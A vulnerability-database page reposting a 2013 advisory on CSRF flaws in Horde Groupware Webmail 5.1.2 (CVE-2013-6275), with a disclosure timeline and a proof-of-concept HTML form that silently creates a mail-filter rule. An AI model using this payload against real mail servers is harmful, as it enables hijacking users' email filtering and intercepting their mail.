Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:30105
HistoryDec 09, 2013 - 12:00 a.m.

Multiple CSRF Horde Groupware Web mail Edition 5.1.2

2013-12-0900:00:00
vulners.com
22
JSON

#############################
Exploit Title : Multiple CSRF Horde Groupware Web mail Edition
Author:Marcela Benetrix
Date: 10/25/13
version: 5.1.2
software link:http://www.horde.org/apps/webmail

#############################
GroupWare Web mail Edition

Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks, notes, files, and bookmarks with the standards compliant components from the Horde Project

##########################
CSRF Location

Several functionalities from Rules section were found to miss the token so as to prevent CSRF

##########################
POC

A <body>
<form action="…/horde/ingo/basic.php?page=rule" method="POST">
<input type="hidden" name="actionID" value="rule_save" />
<input type="hidden" name="conditionnumber" value="-1" />
<input type="hidden" name="name" value="TestingCSRF" />
<input type="hidden" name="combine" value="1" />
<input type="hidden" name="field[0]" value="From" />
<input type="hidden" name="match[0]" value="contains" />
<input type="hidden" name="value[0]"
value="[email protected]" />
<input type="hidden" name="field[1]" value="" />
<input type="hidden" name="action" value="4" />
<input type="hidden" name="actionvalue"
value="[email protected]" />
<input type="hidden" name="stop" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

These were found at:

###########################
CVE identifier

CVE-2013-6275.
##########################
Vendor Notification
10/25/2013 to: the developers. They replied immediately and fixed the problem launching a patch: http://bugs.horde.org/ticket/12796
10/28/2013: Disclosure

Related

packetstorm 1
seebug 1
cve 1
checkpoint_advisories 1
prion 1
ubuntucve 1
exploitpack 1
debiancve 1
exploitdb 1
securityvulns 1
packetstorm
packetstorm
Horde Groupware Web Mail 5.1.2 Cross Site Request Forgery
2013-10-27 00:00:00
seebug
seebug
Horde Groupware Web Mail Edition 5.1.2 - CSRF Vulnerability
2014-07-01 00:00:00
cve
cve
CVE-2013-6275
2019-11-05 19:15:00
checkpoint_advisories
checkpoint_advisories
Horde Groupware Webmail Edition Ingo Filter Cross-Site Request Forgery (CVE-2013-6275)
2013-11-05 00:00:00
prion
prion
Cross site request forgery (csrf)
2019-11-05 19:15:00
ubuntucve
ubuntucve
CVE-2013-6275
2019-11-05 00:00:00
exploitpack
exploitpack
Horde Groupware Web Mail Edition 5.1.2 - Cross-Site Request Forgery (1)
2013-10-29 00:00:00
debiancve
debiancve
CVE-2013-6275
2019-11-05 19:15:00
exploitdb
exploitdb
Horde Groupware Web Mail Edition 5.1.2 - Cross-Site Request Forgery (1)
2013-10-29 00:00:00
securityvulns
securityvulns
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2013-12-09 00:00:00
JSON
Related for SECURITYVULNS:DOC:30105
packetstorm1seebug1cve1checkpoint_advisories1prion1ubuntucve1exploitpack1debiancve1exploitdb1securityvulns1